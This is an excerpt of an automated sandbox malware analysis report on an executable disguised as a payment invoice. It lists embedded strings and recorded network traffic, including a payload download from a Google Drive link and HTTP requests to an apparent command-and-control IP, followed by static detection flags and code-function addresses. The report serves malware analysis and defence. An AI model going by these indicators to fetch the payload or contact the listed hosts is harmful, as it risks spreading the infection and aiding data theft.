    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.117
    Source: ldif60.dll.24.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: ldif60.dll.24.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
    Source: nssckbi.dll.24.drString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
    Source: nssckbi.dll.24.drString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeString found in binary or memory: http://creativecommons.org/licenses/by-nc-sa/3.0/
    Source: nssckbi.dll.24.drString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
    Source: nssckbi.dll.24.drString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
    Source: nssckbi.dll.24.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: nssckbi.dll.24.drString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
    Source: nssckbi.dll.24.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: nssckbi.dll.24.drString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
    Source: nssckbi.dll.24.drString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: nssckbi.dll.24.drString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
    Source: nssckbi.dll.24.drString found in binary or memory: http://crl.securetrust.com/STCA.crl0
    Source: ldif60.dll.24.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
    Source: nssckbi.dll.24.drString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
    Source: ldif60.dll.24.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
    Source: ldif60.dll.24.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
    Source: ldif60.dll.24.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: ldif60.dll.24.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
    Source: nssckbi.dll.24.drString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
    Source: nssckbi.dll.24.drString found in binary or memory: http://ocsp.accv.es0
    Source: ldif60.dll.24.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: ldif60.dll.24.drString found in binary or memory: http://ocsp.digicert.com0N
    Source: ldif60.dll.24.drString found in binary or memory: http://ocsp.thawte.com0
    Source: nssckbi.dll.24.drString found in binary or memory: http://policy.camerfirma.com0
    Source: nssckbi.dll.24.drString found in binary or memory: http://repository.swisssign.com/0
    Source: ldif60.dll.24.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
    Source: ldif60.dll.24.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
    Source: ldif60.dll.24.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
    Source: nssckbi.dll.24.drString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
    Source: nssckbi.dll.24.drString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
    Source: nssckbi.dll.24.drString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
    Source: nssckbi.dll.24.drString found in binary or memory: http://www.accv.es00
    Source: nssckbi.dll.24.drString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
    Source: nssckbi.dll.24.drString found in binary or memory: http://www.certicamara.com/dpc/0Z
    Source: nssckbi.dll.24.drString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
    Source: nssckbi.dll.24.drString found in binary or memory: http://www.chambersign.org1
    Source: nssckbi.dll.24.drString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: nssckbi.dll.24.drString found in binary or memory: http://www.firmaprofesional.com/cps0
    Source: mozglue.dll.24.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
    Source: ldif60.dll.24.drString found in binary or memory: http://www.mozilla.com0
    Source: nssckbi.dll.24.drString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
    Source: nssckbi.dll.24.drString found in binary or memory: http://www.quovadis.bm0
    Source: nssckbi.dll.24.drString found in binary or memory: http://www.quovadisglobal.com/cps0
    Source: sqlite3.dll.24.drString found in binary or memory: http://www.sqlite.org/copyright.html.
    Source: nssckbi.dll.24.drString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
    Source: RYwTiizs2t.24.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: RYwTiizs2t.24.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4wininet.dllMozilla/5
    Source: RYwTiizs2t.24.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: RYwTiizs2t.24.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: RYwTiizs2t.24.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: nssckbi.dll.24.drString found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: nssckbi.dll.24.drString found in binary or memory: https://repository.luxtrust.lu0
    Source: RYwTiizs2t.24.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
    Source: RYwTiizs2t.24.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: nssckbi.dll.24.drString found in binary or memory: https://www.catcert.net/verarrel
    Source: nssckbi.dll.24.drString found in binary or memory: https://www.catcert.net/verarrel05
    Source: ldif60.dll.24.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: RYwTiizs2t.24.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 94.158.245.117
    Source: unknownDNS traffic detected: queries for: drive.google.com
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f4m8v3r8r5cuquncp7lqv8a7pcklg93e/1631574375000/14701716994733946506/*/10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-1s-docs.googleusercontent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /marinolumuop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: telete.in
    Source: global trafficHTTP traffic detected: GET //l/f/jYtq4XsB3dP17SpzNNud/28e4ca709c3ae4e969310e3d8acd9cfc29159591 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.158.245.117
    Source: global trafficHTTP traffic detected: GET //l/f/jYtq4XsB3dP17SpzNNud/fc0be222df12d21cfda3f20b85f1cab0e0a3d225 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.158.245.117
    Source: unknownHTTPS traffic detected: 142.250.102.101:443 -> 192.168.2.5:49788 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.102.132:443 -> 192.168.2.5:49789 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.5:49790 version: TLS 1.2

    System Summary:

    barindex
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Initial sample is a PE file and has a suspicious nameShow sources
    Source: initial sampleStatic PE information: Filename: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
    Executable has a suspicious name (potential lure to open the executable)Show sources
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeStatic file information: Suspicious name
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F7E910_2_022F7E91
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F6F7D0_2_022F6F7D
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FA8480_2_022FA848
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F09410_2_022F0941
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F11C20_2_022F11C2
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FB9D00_2_022FB9D0
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5E240_2_022F5E24
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F3A380_2_022F3A38
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBA020_2_022FBA02
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F161F0_2_022F161F
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F0E1E0_2_022F0E1E
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F1A130_2_022F1A13
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5A6E0_2_022F5A6E
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBA7B0_2_022FBA7B
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F56790_2_022F5679
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F36780_2_022F3678
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FAA4E0_2_022FAA4E
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F12580_2_022F1258
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F76500_2_022F7650
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F26B90_2_022F26B9
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBAB90_2_022FBAB9
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FA2B50_2_022FA2B5
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5EB40_2_022F5EB4
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F628C0_2_022F628C
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5EEB0_2_022F5EEB
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F2AE60_2_022F2AE6
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F36FF0_2_022F36FF
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F0AF80_2_022F0AF8
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F12C90_2_022F12C9
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F3AC80_2_022F3AC8
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F06C20_2_022F06C2
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FC2C00_2_022FC2C0
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F16DC0_2_022F16DC
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F2AD80_2_022F2AD8
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FAAD80_2_022FAAD8
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5AD70_2_022F5AD7
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F76D20_2_022F76D2
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F03290_2_022F0329
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F9F220_2_022F9F22
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FAF3D0_2_022FAF3D
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F630E0_2_022F630E
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F9F1D0_2_022F9F1D
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FA31B0_2_022FA31B
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F03670_2_022F0367
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F13660_2_022F1366
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FAB650_2_022FAB65
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F577F0_2_022F577F
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FAF770_2_022FAF77
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F174F0_2_022F174F
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F47480_2_022F4748
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F0B590_2_022F0B59
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBB560_2_022FBB56
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5F520_2_022F5F52
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F6FA60_2_022F6FA6
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F0BA00_2_022F0BA0
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F3B830_2_022F3B83
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F279D0_2_022F279D
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F9F960_2_022F9F96
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F47940_2_022F4794
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F17E60_2_022F17E6
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5FE30_2_022F5FE3
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FABE20_2_022FABE2
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F47FD0_2_022F47FD
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F13FC0_2_022F13FC
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F27F00_2_022F27F0
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F67CA0_2_022F67CA
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F0BDF0_2_022F0BDF
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBBD10_2_022FBBD1
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F3C2D0_2_022F3C2D
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FA02A0_2_022FA02A
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F70230_2_022F7023
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBC3B0_2_022FBC3B
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F6C330_2_022F6C33
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F040A0_2_022F040A
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBC070_2_022FBC07
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F34160_2_022F3416
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5C150_2_022F5C15
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F58130_2_022F5813
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FAC6C0_2_022FAC6C
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FAC6A0_2_022FAC6A
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F14680_2_022F1468
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F48630_2_022F4863
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F0C600_2_022F0C60
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F18720_2_022F1872
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F344B0_2_022F344B
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FA84A0_2_022FA84A
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F04A30_2_022F04A3
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBCA00_2_022FBCA0
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FA0B60_2_022FA0B6
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F608A0_2_022F608A
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F3C9B0_2_022F3C9B
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F0CEC0_2_022F0CEC
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F34E70_2_022F34E7
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBCE60_2_022FBCE6
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F14FD0_2_022F14FD
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F74F90_2_022F74F9
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F50F50_2_022F50F5
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F4CCC0_2_022F4CCC
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F58CC0_2_022F58CC
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F2CD30_2_022F2CD3
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5CD30_2_022F5CD3
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F19290_2_022F1929
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F49240_2_022F4924
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F35350_2_022F3535
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F3D330_2_022F3D33
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F75310_2_022F7531
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F51000_2_022F5100
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F611D0_2_022F611D
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FA9180_2_022FA918
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F0D6D0_2_022F0D6D
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FA9730_2_022FA973
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F594D0_2_022F594D
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F555C0_2_022F555C
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FA1580_2_022FA158
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F99510_2_022F9951
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F95AE0_2_022F95AE
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F51AB0_2_022F51AB
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F15A60_2_022F15A6
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F75BF0_2_022F75BF
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F69BA0_2_022F69BA
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F61B90_2_022F61B9
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F518E0_2_022F518E
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F9D8E0_2_022F9D8E
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F898A0_2_022F898A
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F19890_2_022F1989
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F99870_2_022F9987
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5D860_2_022F5D86
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F39970_2_022F3997
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F35E90_2_022F35E9
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F3DE80_2_022F3DE8
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FA5E80_2_022FA5E8
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FA1E70_2_022FA1E7
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F9DE50_2_022F9DE5
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F59E30_2_022F59E3
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F55CA0_2_022F55CA
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F11C90_2_022F11C9
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F39C40_2_022F39C4
